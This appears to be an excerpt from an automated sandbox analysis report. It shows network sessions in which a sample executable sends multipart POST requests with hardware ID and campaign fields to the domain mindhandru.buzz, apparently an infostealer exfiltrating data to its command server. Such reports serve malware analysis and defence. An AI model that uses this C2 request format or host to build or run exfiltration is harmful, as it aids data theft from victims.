                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 41 49 72 44 45 6d 6a 50 69 6e 36 46 53 4f 4c 6b 73 2b 52 37 34 63 59 64 63 41 6e 6b 62 6d 49 6d 4b 58 4e 55 78 77 31 53 72 39 31 53 6a 73 52 59 50 59 58 44 4f 64 64 42 39 4b 33 6d 6f 6c 54 71 34 51 42 67 48 66 6b 70 65 6d 34 39 4f 31 37 4f 54 67 76 72 31 45 2b 45 77 46 6f 34 67 49 78 7a 6d 55 44 71 34 4c 76 74 65 66 54 41 48 6e 59 45 34 47 4a 33 49 43 6c 2f 56 63 59 47 57 4b 47 58 44 73 33 49 53 6e 44 58 77 30 4b 61 53 65 7a 75 71 4b 4a 73 71 4e 46 51 66 41 4f 76 4d 53 55 73 4b 6e 74 57 7a 67 4a 59 6f 39 5a 4d 67 38 68 58 4f 59 65 4c 5a 5a 5a 43 35 4f 79 77 37 58 4c 69 7a 52 56 2f 43 4f 74 76 61 6d 42 71 4f 31 37 61 54 67 76 72 2b 47 65 34 6a 58 4d 4b 7a 35 77 35 6a 67 62 72 34 66 36 36 4d 2b 72 4c 48 48 4d 41 36 57 42 70 4b 69 31 77 56 63 6b 4b 58 36 4c
                                                                                                                                  Data Ascii: AIrDEmjPin6FSOLks+R74cYdcAnkbmImKXNUxw1Sr91SjsRYPYXDOddB9K3molTq4QBgHfkpem49O17OTgvr1E+EwFo4gIxzmUDq4LvtefTAHnYE4GJ3ICl/VcYGWKGXDs3ISnDXw0KaSezuqKJsqNFQfAOvMSUsKntWzgJYo9ZMg8hXOYeLZZZC5Oyw7XLizRV/COtvamBqO17aTgvr+Ge4jXMKz5w5jgbr4f66M+rLHHMA6WBpKi1wVckKX6L
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 6c 4d 32 6e 59 52 2b 68 55 6a 68 34 72 62 71 65 75 66 4d 46 58 59 4a 34 32 4e 6b 4a 79 70 31 55 59 4a 41 45 36 7a 50 41 4e 57 50 63 79 43 55 6b 57 47 61 5a 2b 48 69 2f 76 30 39 2f 34 67 58 64 30 2b 33 4b 57 77 79 49 48 5a 4c 79 77 6c 64 70 4e 52 53 6a 4d 4a 5a 49 6f 69 4d 63 35 42 4b 36 75 4b 34 34 33 62 73 78 42 64 2b 42 4f 42 6c 4a 57 35 6b 66 45 47 43 56 68 4f 46 33 46 4f 61 7a 46 77 37 6d 5a 67 33 69 41 6a 31 72 62 6e 75 4d 37 36 49 45 33 41 45 36 32 6c 70 49 43 42 32 57 64 41 42 56 4b 7a 65 53 35 2f 46 56 54 65 45 69 33 79 59 51 50 37 68 73 50 42 32 39 4e 70 51 4e 55 2f 6f 63 53 56 34 5a 45 31 65 30 68 35 51 36 65 5a 57 6a 74 6c 5a 50 59 50 44 61 4e 6c 66 72 4f 71 79 6f 69 75 6d 7a 68 39 79 44 4f 42 6f 62 43 77 70 66 6c 44 48 44 31 57 76 33 55 71 4e
                                                                                                                                  Data Ascii: lM2nYR+hUjh4rbqeufMFXYJ42NkJyp1UYJAE6zPANWPcyCUkWGaZ+Hi/v09/4gXd0+3KWwyIHZLywldpNRSjMJZIoiMc5BK6uK443bsxBd+BOBlJW5kfEGCVhOF3FOazFw7mZg3iAj1rbnuM76IE3AE62lpICB2WdABVKzeS5/FVTeEi3yYQP7hsPB29NpQNU/ocSV4ZE1e0h5Q6eZWjtlZPYPDaNlfrOqyoiumzh9yDOBobCwpflDHD1Wv3UqN
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 44 4e 62 74 64 42 34 4b 33 6d 6f 6e 44 68 79 78 46 78 42 75 4e 6d 59 69 51 32 63 56 37 51 44 31 4b 67 32 6b 79 4e 77 6c 38 36 6a 6f 70 36 6d 30 76 72 36 72 48 6e 4d 36 69 49 46 32 4e 50 74 79 6c 45 4c 53 39 33 41 70 68 4f 54 4f 58 4f 41 49 72 44 45 6d 6a 50 67 33 32 53 54 4f 48 75 73 65 46 68 35 38 34 43 65 77 4c 6c 65 32 38 72 49 58 5a 55 7a 77 31 56 72 64 78 4d 6e 38 5a 53 4d 34 54 44 4f 64 64 42 39 4b 33 6d 6f 6c 44 78 33 68 70 38 41 2f 6c 69 5a 43 4d 79 64 6b 6d 43 51 42 4f 36 30 46 48 4e 6c 30 51 67 6d 49 52 6f 32 56 2b 73 36 72 4b 69 4b 36 62 4f 47 58 30 49 36 57 64 33 4a 53 4a 30 56 73 73 48 56 36 50 55 51 49 6e 4c 56 54 57 4d 6a 33 79 51 52 65 50 70 74 2b 78 36 36 59 68 65 4f 77 6a 33 4b 54 31 67 42 57 42 61 7a 67 4d 54 74 4a 6c 5a 7a 63 68 65 63
                                                                                                                                  Data Ascii: DNbtdB4K3monDhyxFxBuNmYiQ2cV7QD1Kg2kyNwl86jop6m0vr6rHnM6iIF2NPtylELS93AphOTOXOAIrDEmjPg32STOHuseFh584CewLle28rIXZUzw1VrdxMn8ZSM4TDOddB9K3molDx3hp8A/liZCMydkmCQBO60FHNl0QgmIRo2V+s6rKiK6bOGX0I6Wd3JSJ0VssHV6PUQInLVTWMj3yQRePpt+x66YheOwj3KT1gBWBazgMTtJlZzchec
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 50 42 73 7a 6d 71 4f 64 30 38 49 6f 6c 65 41 48 68 62 6e 4e 67 4f 30 51 58 67 67 46 4a 36 34 39 35 6c 49 39 56 50 4d 2f 62 4e 34 4a 42 37 4f 71 6b 39 48 54 71 32 52 74 32 41 38 31 6d 59 6a 59 6e 64 46 72 54 42 78 2b 67 32 67 44 44 6a 31 55 6f 7a 39 73 33 75 45 48 36 37 70 48 68 59 75 2b 49 58 6a 73 49 2b 53 6b 39 59 42 6f 37 53 38 45 65 55 4b 54 47 66 73 32 58 53 77 37 50 69 47 47 51 56 75 2f 37 74 65 39 2f 39 2f 5a 51 49 31 75 39 4f 7a 64 79 64 6d 51 5a 33 54 45 64 36 39 59 41 31 66 5a 4c 63 4a 6e 44 4c 38 55 49 72 50 2f 2b 75 6a 4f 68 79 77 4a 70 43 65 78 2f 5a 6d 63 61 52 58 37 55 42 46 53 37 30 46 65 43 6a 78 78 77 67 4d 4d 76 72 67 62 6c 36 71 58 7a 5a 65 76 59 46 7a 73 77 6f 53 6c 39 59 48 77 37 62 4d 45 41 58 61 7a 42 55 63 44 6f 52 44 71 49 6b 33
                                                                                                                                  Data Ascii: PBszmqOd08IoleAHhbnNgO0QXggFJ6495lI9VPM/bN4JB7Oqk9HTq2Rt2A81mYjYndFrTBx+g2gDDj1Uoz9s3uEH67pHhYu+IXjsI+Sk9YBo7S8EeUKTGfs2XSw7PiGGQVu/7te9/9/ZQI1u9OzdydmQZ3TEd69YA1fZLcJnDL8UIrP/+ujOhywJpCex/ZmcaRX7UBFS70FeCjxxwgMMvrgbl6qXzZevYFzswoSl9YHw7bMEAXazBUcDoRDqIk3
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 34 76 4c 73 65 4f 62 50 41 47 30 55 6f 32 46 6d 4f 6a 35 46 5a 2b 6b 43 56 61 7a 4e 52 34 76 70 63 6e 44 42 77 33 6a 58 48 74 57 74 39 71 4a 4d 71 49 67 49 4f 31 65 76 58 47 59 75 4b 6e 78 50 30 30 4e 37 69 4f 31 36 7a 2b 4e 56 4a 63 32 33 63 49 64 58 35 2b 43 79 6f 6a 32 6d 7a 6c 41 6a 58 36 45 70 59 54 46 6b 49 77 6d 51 56 51 62 34 67 42 44 66 30 42 77 70 7a 35 55 33 7a 78 53 69 72 61 79 69 4b 36 61 50 45 32 6b 64 36 57 70 7a 49 32 4e 46 5a 2b 55 41 56 4b 72 42 55 4a 72 41 62 41 36 61 67 48 6d 5a 51 66 72 38 2f 71 77 7a 36 59 68 49 51 6b 2b 6e 4b 56 70 75 5a 47 4d 5a 6d 6b 35 6d 71 4e 6c 4f 69 74 6c 44 66 61 69 4e 63 4a 5a 51 2f 50 71 78 6f 6a 32 6d 7a 6c 41 6a 58 61 45 70 59 54 46 6b 49 77 6d 51 56 51 62 34 67 42 44 66 30 42 77 70 7a 35 55 33 7a 78 53
                                                                                                                                  Data Ascii: 4vLseObPAG0Uo2FmOj5FZ+kCVazNR4vpcnDBw3jXHtWt9qJMqIgIO1evXGYuKnxP00N7iO16z+NVJc23cIdX5+Cyoj2mzlAjX6EpYTFkIwmQVQb4gBDf0Bwpz5U3zxSirayiK6aPE2kd6WpzI2NFZ+UAVKrBUJrAbA6agHmZQfr8/qwz6YhIQk+nKVpuZGMZmk5mqNlOitlDfaiNcJZQ/Pqxoj2mzlAjXaEpYTFkIwmQVQb4gBDf0Bwpz5U3zxS
                                                                                                                                  2024-12-27 07:41:52 UTC1369INData Raw: 54 48 47 7a 77 5a 34 54 36 45 70 61 57 42 38 4f 31 6a 49 48 6c 36 6b 30 41 79 4b 31 56 56 77 77 63 4e 35 31 78 36 73 37 4c 54 79 66 75 6e 50 58 48 30 42 34 53 6c 36 62 6a 30 37 54 34 4a 57 41 4f 57 58 55 73 32 58 45 6e 65 4d 6b 57 57 52 52 66 72 75 2b 64 78 4e 79 39 6f 58 61 77 79 74 57 47 67 6b 4d 6d 35 61 30 67 6c 74 6c 66 70 53 69 74 39 52 63 72 36 56 64 4a 64 49 36 36 33 77 6f 6d 75 6d 6b 46 42 57 48 65 68 35 5a 6d 42 71 4f 31 57 43 56 68 4f 6d 78 55 65 64 7a 42 34 33 6c 59 51 33 69 41 6a 31 72 61 69 69 4b 37 57 47 55 47 6c 50 74 79 6b 69 4c 69 6c 36 57 73 77 4e 51 62 6e 52 51 35 76 4d 46 51 36 78 72 6d 57 51 56 75 2b 76 6a 2b 39 33 38 4e 30 54 61 77 6a 52 56 30 67 79 49 32 74 61 67 43 4a 55 70 74 74 2b 73 2f 68 44 4e 35 2f 42 55 5a 52 51 37 36 33 77
                                                                                                                                  Data Ascii: THGzwZ4T6EpaWB8O1jIHl6k0AyK1VVwwcN51x6s7LTyfunPXH0B4Sl6bj07T4JWAOWXUs2XEneMkWWRRfru+dxNy9oXawytWGgkMm5a0gltlfpSit9Rcr6VdJdI663womumkFBWHeh5ZmBqO1WCVhOmxUedzB43lYQ3iAj1raiiK7WGUGlPtykiLil6WswNQbnRQ5vMFQ6xrmWQVu+vj+938N0TawjRV0gyI2tagCJUptt+s/hDN5/BUZRQ763w


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.949724172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:41:53 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=3RZK0SB31R8T983C3ZH
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 12857
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:41:53 UTC12857OUTData Raw: 2d 2d 33 52 5a 4b 30 53 42 33 31 52 38 54 39 38 33 43 33 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 33 52 5a 4b 30 53 42 33 31 52 38 54 39 38 33 43 33 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 52 5a 4b 30 53 42 33 31 52 38 54 39 38 33 43 33 5a 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                  Data Ascii: --3RZK0SB31R8T983C3ZHContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--3RZK0SB31R8T983C3ZHContent-Disposition: form-data; name="pid"2--3RZK0SB31R8T983C3ZHContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                  2024-12-27 07:41:54 UTC1130INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:41:54 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=rp86j2td3h01mdf3f39pflqv43; expires=Tue, 22 Apr 2025 01:28:33 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D8CjHqE73Hle2IiCt4t6lubEvv9Rpi2eG52eNToMOTn5OuDLFEhsHs3iLTLGa8dlP4ZSD6%2Bnh4%2BuztayyL%2FELFWDPX%2Bz5KlLhuOqHiKTrUq4J2abeDIp%2B5is4U6ZPtEf8sU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87abbc4fe1427c-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1798&rtt_var=686&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13797&delivery_rate=1624026&cwnd=246&unsent_bytes=0&cid=de7c7506d703dec8&ts=865&x=0"
                                                                                                                                  2024-12-27 07:41:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-27 07:41:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.949730172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:41:56 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=QDB45LVK03BQP
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 15039
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:41:56 UTC15039OUTData Raw: 2d 2d 51 44 42 34 35 4c 56 4b 30 33 42 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 51 44 42 34 35 4c 56 4b 30 33 42 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 44 42 34 35 4c 56 4b 30 33 42 51 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 51 44 42 34 35
                                                                                                                                  Data Ascii: --QDB45LVK03BQPContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--QDB45LVK03BQPContent-Disposition: form-data; name="pid"2--QDB45LVK03BQPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--QDB45
                                                                                                                                  2024-12-27 07:42:04 UTC1128INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:42:04 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=v32d772gmom7ughv0272168dg7; expires=Tue, 22 Apr 2025 01:28:42 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kN9%2FlPE1kvQXgPPfBHUbr3DGlgp48h8SSiEWTZaXtthxl7BOUtES2HdLG%2Fim%2FdU1Il7iIRyaXGXYsuytK8joBfKDHGVwdCi0QdX1FrQznTPZU9weCsaX5undf9Sf9XPhemE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87abca68747c96-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1763&rtt_var=681&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15973&delivery_rate=1583514&cwnd=173&unsent_bytes=0&cid=e4c0cfbda29462ec&ts=8173&x=0"
                                                                                                                                  2024-12-27 07:42:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-27 07:42:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.949752172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:42:05 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=8IC5CEH6
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 20525
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:42:05 UTC15331OUTData Raw: 2d 2d 38 49 43 35 43 45 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 38 49 43 35 43 45 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 49 43 35 43 45 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 49 43 35 43 45 48 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                  Data Ascii: --8IC5CEH6Content-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--8IC5CEH6Content-Disposition: form-data; name="pid"3--8IC5CEH6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8IC5CEH6Content-Di
                                                                                                                                  2024-12-27 07:42:05 UTC5194OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: s}Q0u?4E([:s~X`nO
                                                                                                                                  2024-12-27 07:42:06 UTC1140INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:42:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=jg2dktdrmqn3pqjcb3pmsa4mnv; expires=Tue, 22 Apr 2025 01:28:45 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mu%2BceBeLLAutbHch%2FUUEtkesRaBfK1yZI1x9d%2FTKu0v%2BVNXW1p4Eunqnp%2BVm1TjkaN9EmfOQ%2Fof4AZo86vmA7%2BjfambUeO5iYdfHY0KUidiK4FLZYTPpxpPeIs%2BY9R%2BuDgo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87ac0789ee8c84-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1788&rtt_var=682&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21476&delivery_rate=1590413&cwnd=175&unsent_bytes=0&cid=d70133de804dd0b7&ts=1004&x=0"
                                                                                                                                  2024-12-27 07:42:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-27 07:42:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.949758172.67.165.1854436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:42:08 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=X5992ZCBKQN2H
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 1209
                                                                                                                                  Host: mindhandru.buzz
                                                                                                                                  2024-12-27 07:42:08 UTC1209OUTData Raw: 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 34 44 32 43 34 30 32 32 38 33 30 35 35 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 35 39 39 32 5a 43 42 4b 51 4e 32 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 35 39 39 32
                                                                                                                                  Data Ascii: --X5992ZCBKQN2HContent-Disposition: form-data; name="hwid"9D4D2C402283055CBEBA0C6A975F1733--X5992ZCBKQN2HContent-Disposition: form-data; name="pid"1--X5992ZCBKQN2HContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--X5992
                                                                                                                                  2024-12-27 07:42:09 UTC1130INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 27 Dec 2024 07:42:08 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Set-Cookie: PHPSESSID=12gc22ufgjphf0bkibjj9devbg; expires=Tue, 22 Apr 2025 01:28:47 GMT; Max-Age=9999999; path=/
                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzXpdG%2B4jKXl5DGy26x6dqXbKNyCqQIutME7zFziEPn44qJ7jj0PXwZK0jWR59Gm%2F9kzIZHK%2Bl%2FcX3kxiiZSWqoyocpprs1Tw1aAgvlKYiLx4%2F6%2BxwsUQIVgi56nnyDOzOk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f87ac17ceac7295-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1802&rtt_var=687&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2120&delivery_rate=1579232&cwnd=206&unsent_bytes=0&cid=b66677c8d3cad38d&ts=754&x=0"
                                                                                                                                  2024-12-27 07:42:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                  2024-12-27 07:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.949763104.21.11.1014436492C:\Users\user\Desktop\zi042476Iv.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-27 07:42:11 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: multipart/form-data; boundary=Q9LXEUVN8EZW59MC
